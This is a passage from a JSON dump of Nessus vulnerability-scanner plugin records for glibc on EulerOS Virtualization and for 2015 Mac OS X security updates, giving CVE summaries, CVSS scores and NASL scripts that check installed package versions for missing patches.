extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GNU C Library\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T00:25:00", "description": "According to the versions of the glibc packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - stdlib/canonicalize.c in the GNU C Library (aka glibc or libc6) 2.27 and earlier, when processing very long pathname arguments to the realpath function, could encounter an integer overflow on 32-bit architectures, leading to a stack-based buffer overflow and, potentially, arbitrary code execution.(CVE-2018-11236)\n\n - An integer overflow vulnerability was found in hcreate() and hcreate_r() functions which could result in an out-of-bounds memory access. This could lead to application crash or, potentially, arbitrary code execution.(CVE-2015-8778)\n\n - A stack-based buffer overflow was found in the way the libresolv library performed dual A/AAAA DNS queries. A remote attacker could create a specially crafted DNS response which could cause libresolv to crash or, potentially, execute code with the permissions of the user running the library. Note: this issue is only exposed when libresolv is called from the nss_dns NSS service module.(CVE-2015-7547)\n\n - A flaw was found in the regular expression matching routines that process multibyte character input. If an application utilized the glibc regular expression matching mechanism, an attacker could provide specially-crafted input that, when processed, would cause the application to crash.(CVE-2013-0242)\n\n - A flaw was found in the way memory was being allocated on the stack for user space binaries. 
If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is glibc-side mitigation which blocks processing of LD_LIBRARY_PATH for programs running in secure-execution mode and reduces the number of allocations performed by the processing of LD_AUDIT, LD_PRELOAD, and LD_HWCAP_MASK, making successful exploitation of this issue more difficult.(CVE-2017-1000366)\n\n - The DNS stub resolver in the GNU C Library (aka glibc or libc6) before version 2.26, when EDNS support is enabled, will solicit large UDP responses from name servers, potentially simplifying off-path DNS spoofing attacks due to IP fragmentation.(CVE-2017-12132)\n\n - It was found that the files back end of Name Service Switch (NSS) did not isolate iteration over an entire database from key-based look-up API calls. An application performing look-ups on a database while iterating over it could enter an infinite loop, leading to a denial of service.(CVE-2014-8121)\n\n - Stack-based buffer overflow in the getaddrinfo function in sysdeps/posix/getaddrinfo.c in the GNU C Library (aka glibc or libc6) allows remote attackers to cause a denial of service (crash) via vectors involving hostent conversion. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-4458.(CVE-2016-3706)\n\n - In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.(CVE-2018-1000001)\n\n - Stack-based buffer overflow in string/strcoll_l.c in the GNU C Library (aka glibc or libc6) 2.17 and earlier allows context-dependent attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long string that triggers a malloc failure and use of the alloca function.(CVE-2012-4424)\n\n - It was found that the dynamic loader did not sanitize the LD_POINTER_GUARD environment variable. An attacker could use this flaw to bypass the pointer guarding protection on set-user-ID or set-group-ID programs to execute arbitrary code with the permissions of the user running the application.(CVE-2015-8777)\n\n - The glob function in glob.c in the GNU C Library (aka glibc or libc6) before 2.27 contains a buffer overflow during unescaping of user names with the ~ operator.(CVE-2017-15804)\n\n - res_query in libresolv in glibc before 2.25 allows remote attackers to cause a denial of service (NULL pointer dereference and process crash).(CVE-2015-5180)\n\n - pt_chown in GNU C Library (aka glibc or libc6) before 2.18 does not properly check permissions for tty files, which allows local users to change the permission on the files and obtain access to arbitrary pseudo-terminals by leveraging a FUSE file system.(CVE-2013-2207)\n\n - A stack overflow flaw was found in glibc's swscanf() function. An attacker able to make an application call the swscanf() function could use this flaw to crash that application or, potentially, execute arbitrary code with the permissions of the user running the application.(CVE-2015-1473)\n\n - It was found that getaddrinfo() did not limit the amount of stack memory used during name resolution. 
An attacker able to make an application resolve an attacker-controlled hostname or IP address could possibly cause the application to exhaust all stack memory and crash.(CVE-2013-4458)\n\n - A heap-based buffer overflow was found in glibc's\n __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.(CVE-2015-0235)\n\n - Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in glibc's memory allocator functions (pvalloc, valloc, and memalign). If an application used such a function, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.(CVE-2013-4332)\n\n - An integer overflow in the implementation of the posix_memalign in memalign functions in the GNU C Library (aka glibc or libc6) 2.26 and earlier could cause these functions to return a pointer to a heap area that is too small, potentially leading to heap corruption.(CVE-2018-6485)\n\n - A stack based buffer overflow vulnerability was found in the catopen() function. An excessively long string passed to the function could cause it to crash or, potentially, execute arbitrary code.(CVE-2015-8779)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : glibc (EulerOS-SA-2019-1551)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4424", "CVE-2013-0242", "CVE-2013-2207", "CVE-2013-4332", "CVE-2013-4458", "CVE-2014-8121", "CVE-2015-0235", "CVE-2015-1473", "CVE-2015-5180", "CVE-2015-7547", "CVE-2015-8777", "CVE-2015-8778", "CVE-2015-8779", "CVE-2016-3706", "CVE-2017-1000366", "CVE-2017-12132", "CVE-2017-15804", "CVE-2018-1000001", "CVE-2018-11236", "CVE-2018-6485"], "modified": "2021-02-08T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:glibc", "p-cpe:/a:huawei:euleros:glibc-common", "p-cpe:/a:huawei:euleros:glibc-devel", "p-cpe:/a:huawei:euleros:glibc-headers", "p-cpe:/a:huawei:euleros:nscd", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1551.NASL", "href": "https://www.tenable.com/plugins/nessus/125004", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125004);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\n \"CVE-2012-4424\",\n \"CVE-2013-0242\",\n \"CVE-2013-2207\",\n \"CVE-2013-4332\",\n \"CVE-2013-4458\",\n \"CVE-2014-8121\",\n \"CVE-2015-0235\",\n \"CVE-2015-1473\",\n \"CVE-2015-5180\",\n \"CVE-2015-7547\",\n \"CVE-2015-8777\",\n \"CVE-2015-8778\",\n \"CVE-2015-8779\",\n \"CVE-2016-3706\",\n \"CVE-2017-1000366\",\n \"CVE-2017-12132\",\n \"CVE-2017-15804\",\n \"CVE-2018-1000001\",\n \"CVE-2018-11236\",\n \"CVE-2018-6485\"\n );\n script_bugtraq_id(\n 55543,\n 57638,\n 61960,\n 62324,\n 63299,\n 72325,\n 72499,\n 73038\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : glibc (EulerOS-SA-2019-1551)\");\n 
script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the glibc packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - stdlib/canonicalize.c in the GNU C Library (aka glibc\n or libc6) 2.27 and earlier, when processing very long\n pathname arguments to the realpath function, could\n encounter an integer overflow on 32-bit architectures,\n leading to a stack-based buffer overflow and,\n potentially, arbitrary code execution.(CVE-2018-11236)\n\n - An integer overflow vulnerability was found in\n hcreate() and hcreate_r() functions which could result\n in an out-of-bounds memory access. This could lead to\n application crash or, potentially, arbitrary code\n execution.(CVE-2015-8778)\n\n - A stack-based buffer overflow was found in the way the\n libresolv library performed dual A/AAAA DNS queries. A\n remote attacker could create a specially crafted DNS\n response which could cause libresolv to crash or,\n potentially, execute code with the permissions of the\n user running the library. Note: this issue is only\n exposed when libresolv is called from the nss_dns NSS\n service module.(CVE-2015-7547)\n\n - A flaw was found in the regular expression matching\n routines that process multibyte character input. If an\n application utilized the glibc regular expression\n matching mechanism, an attacker could provide\n specially-crafted input that, when processed, would\n cause the application to crash.(CVE-2013-0242)\n\n - A flaw was found in the way memory was being allocated\n on the stack for user space binaries. 
If heap (or\n different memory region) and stack memory regions were\n adjacent to each other, an attacker could use this flaw\n to jump over the stack guard gap, cause controlled\n memory corruption on process stack or the adjacent\n memory region, and thus increase their privileges on\n the system. This is glibc-side mitigation which blocks\n processing of LD_LIBRARY_PATH for programs running in\n secure-execution mode and reduces the number of\n allocations performed by the processing of LD_AUDIT,\n LD_PRELOAD, and LD_HWCAP_MASK, making successful\n exploitation of this issue more\n difficult.(CVE-2017-1000366)\n\n - The DNS stub resolver in the GNU C Library (aka glibc\n or libc6) before version 2.26, when EDNS support is\n enabled, will solicit large UDP responses from name\n servers, potentially simplifying off-path DNS spoofing\n attacks due to IP fragmentation.(CVE-2017-12132)\n\n - It was found that the files back end of Name Service\n Switch (NSS) did not isolate iteration over an entire\n database from key-based look-up API calls. An\n application performing look-ups on a database while\n iterating over it could enter an infinite loop, leading\n to a denial of service.(CVE-2014-8121)\n\n - Stack-based buffer overflow in the getaddrinfo function\n in sysdeps/posix/getaddrinfo.c in the GNU C Library\n (aka glibc or libc6) allows remote attackers to cause a\n denial of service (crash) via vectors involving hostent\n conversion. 
NOTE: this vulnerability exists because of\n an incomplete fix for CVE-2013-4458.(CVE-2016-3706)\n\n - In glibc 2.26 and earlier there is confusion in the\n usage of getcwd() by realpath() which can be used to\n write before the destination buffer leading to a buffer\n underflow and potential code\n execution.(CVE-2018-1000001)\n\n - Stack-based buffer overflow in string/strcoll_l.c in\n the GNU C Library (aka glibc or libc6) 2.17 and earlier\n allows context-dependent attackers to cause a denial of\n service (crash) or possibly execute arbitrary code via\n a long string that triggers a malloc failure and use of\n the alloca function.(CVE-2012-4424)\n\n - It was found that the dynamic loader did not sanitize\n the LD_POINTER_GUARD environment variable. An attacker\n could use this flaw to bypass the pointer guarding\n protection on set-user-ID or set-group-ID programs to\n execute arbitrary code with the permissions of the user\n running the application.(CVE-2015-8777)\n\n - The glob function in glob.c in the GNU C Library (aka\n glibc or libc6) before 2.27 contains a buffer overflow\n during unescaping of user names with the ~\n operator.(CVE-2017-15804)\n\n - res_query in libresolv in glibc before 2.25 allows\n remote attackers to cause a denial of service (NULL\n pointer dereference and process crash).(CVE-2015-5180)\n\n - pt_chown in GNU C Library (aka glibc or libc6) before\n 2.18 does not properly check permissions for tty files,\n which allows local users to change the permission on\n the files and obtain access to arbitrary\n pseudo-terminals by leveraging a FUSE file\n system.(CVE-2013-2207)\n\n - A stack overflow flaw was found in glibc's swscanf()\n function. 
An attacker able to make an application call\n the swscanf() function could use this flaw to crash\n that application or, potentially, execute arbitrary\n code with the permissions of the user running the\n application.(CVE-2015-1473)\n\n - It was found that getaddrinfo() did not limit the\n amount of stack memory used during name resolution. An\n attacker able to make an application resolve an\n attacker-controlled hostname or IP address could\n possibly cause the application to exhaust all stack\n memory and crash.(CVE-2013-4458)\n\n - A heap-based buffer overflow was found in glibc's\n __nss_hostname_digits_dots() function, which is used by\n the gethostbyname() and gethostbyname2() glibc function\n calls. A remote attacker able to make an application\n call either of these functions could use this flaw to\n execute arbitrary code with the permissions of the user\n running the application.(CVE-2015-0235)\n\n - Multiple integer overflow flaws, leading to heap-based\n buffer overflows, were found in glibc's memory\n allocator functions (pvalloc, valloc, and memalign). If\n an application used such a function, it could cause the\n application to crash or, potentially, execute arbitrary\n code with the privileges of the user running the\n application.(CVE-2013-4332)\n\n - An integer overflow in the implementation of the\n posix_memalign in memalign functions in the GNU C\n Library (aka glibc or libc6) 2.26 and earlier could\n cause these functions to return a pointer to a heap\n area that is too small, potentially leading to heap\n corruption.(CVE-2018-6485)\n\n - A stack based buffer overflow vulnerability was found\n in the catopen() function. An excessively long string\n passed to the function could cause it to crash or,\n potentially, execute arbitrary code.(CVE-2015-8779)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1551\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?97fa15c6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected glibc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'glibc realpath() Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"glibc-2.17-222.h11\",\n \"glibc-common-2.17-222.h11\",\n \"glibc-devel-2.17-222.h11\",\n \"glibc-headers-2.17-222.h11\",\n \"nscd-2.17-222.h11\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2023-01-11T15:03:37", "description": "The remote host is running a version of Mac OS X 10.9.5 or 10.10.5 that is missing Security Update 2015-004 or 2015-007. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework\n - apache_mod_php\n - ATS\n - Audio\n - CFNetwork\n - CoreGraphics\n - CoreText\n - EFI\n - FontParser\n - Grand Central Dispatch\n - ImageIO\n - IOAcceleratorFamily\n - Kernel\n - libarchive\n - MCX Application Restrictions\n - OpenGL\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-10T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Updates 2015-004 / 2015-007)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273", "CVE-2015-4860", "CVE-2015-5924", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5932", "CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5938", "CVE-2015-5939", "CVE-2015-5940", "CVE-2015-5942", 
"CVE-2015-5944", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6975", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6984", "CVE-2015-6985", "CVE-2015-6989", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6993", "CVE-2015-6996", "CVE-2015-7009", "CVE-2015-7010", "CVE-2015-7016", "CVE-2015-7018", "CVE-2015-7023", "CVE-2015-7035"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2015-007.NASL", "href": "https://www.tenable.com/plugins/nessus/86829", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86829);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-4860\",\n \"CVE-2015-5924\",\n \"CVE-2015-5925\",\n \"CVE-2015-5926\",\n \"CVE-2015-5927\",\n \"CVE-2015-5932\",\n \"CVE-2015-5933\",\n \"CVE-2015-5934\",\n \"CVE-2015-5935\",\n \"CVE-2015-5936\",\n \"CVE-2015-5937\",\n \"CVE-2015-5938\",\n \"CVE-2015-5939\",\n \"CVE-2015-5940\",\n \"CVE-2015-5942\",\n \"CVE-2015-5944\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\",\n \"CVE-2015-6975\",\n \"CVE-2015-6976\",\n \"CVE-2015-6977\",\n \"CVE-2015-6978\",\n \"CVE-2015-6984\",\n \"CVE-2015-6985\",\n \"CVE-2015-6989\",\n \"CVE-2015-6991\",\n \"CVE-2015-6992\",\n \"CVE-2015-6993\",\n \"CVE-2015-6996\",\n \"CVE-2015-7009\",\n \"CVE-2015-7010\",\n \"CVE-2015-7016\",\n \"CVE-2015-7018\",\n \"CVE-2015-7023\",\n \"CVE-2015-7035\"\n );\n script_bugtraq_id(\n 69477,\n 72325,\n 72701,\n 74971,\n 76317,\n 76644,\n 76649,\n 76733,\n 76734,\n 76738,\n 77162,\n 77263,\n 77265,\n 77266,\n 77270\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-10-21-4\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Updates 2015-004 / 2015-007)\");\n script_summary(english:\"Checks for the 
presence of Security Update 2015-004 and 2015-007.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.9.5 or 10.10.5\nthat is missing Security Update 2015-004 or 2015-007. It is,\ntherefore, affected by multiple vulnerabilities in the following\ncomponents :\n\n - Accelerate Framework\n - apache_mod_php\n - ATS\n - Audio\n - CFNetwork\n - CoreGraphics\n - CoreText\n - EFI\n - FontParser\n - Grand Central Dispatch\n - ImageIO\n - IOAcceleratorFamily\n - Kernel\n - libarchive\n - MCX Application Restrictions\n - OpenGL\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205375\");\n # https://lists.apple.com/archives/security-announce/2015/Oct/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7e01da3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2015-004 / 2015-007 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\n# Advisory states that update 2015-004 is available for 10.10.5 and update 2015-007 is available for 10.9.5\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.(9|10)\\.5([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9.5 or Mac OS X 10.10.5\");\n\nif (\"10.9.5\" >< os) patch = \"2015-007\";\nelse if (\"10.10.5\" >< os) patch = \"2015-004\";\n\npackages = 
get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\..*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-17T15:24:21", "description": "The remote host is running a version of Mac OS X version 10.11.x prior to 10.11.1 and is affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273, CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, CVE-2015-6838)\n - ATS (CVE-2015-6985)\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n - Bom (CVE-2015-7006)\n - CFNetwork (CVE-2015-7023)\n - configd (CVE-2015-7015)\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992, CVE-2015-7017)\n - Directory Utility (CVE-2015-6980)\n - Disk Images (CVE-2015-6995)\n - EFI (CVE-2015-7035)\n - File Bookmark (CVE-2015-6987)\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976, CVE-2015-6977, CVE-2015-6978, CVE-2015-6990, CVE-2015-6991, CVE-2015-6993, CVE-2015-7008, CVE-2015-7009, CVE-2015-7010, 
CVE-2015-7018)\n - Grand Central Dispatch (CVE-2015-6989)\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020, CVE-2015-7021)\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937, CVE-2015-5938, CVE-2015-5939)\n - IOAcceleratorFamily (CVE-2015-6996)\n - IOHIDFamily (CVE-2015-6974)\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n - libarchive (CVE-2015-6984)\n - MCX Application Restrictions (CVE-2015-7016)\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n - OpenGL (CVE-2015-5924)\n - OpenSSH (CVE-2015-6563)\n - Sandbox (CVE-2015-5945)\n - Script Editor (CVE-2015-7007)\n - Security (CVE-2015-6983, CVE-2015-7024)\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-27T00:00:00", "type": "nessus", "title": "Mac OS X 10.9.5 or later < 10.11.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6151", "CVE-2014-3565", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-5924", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5932", 
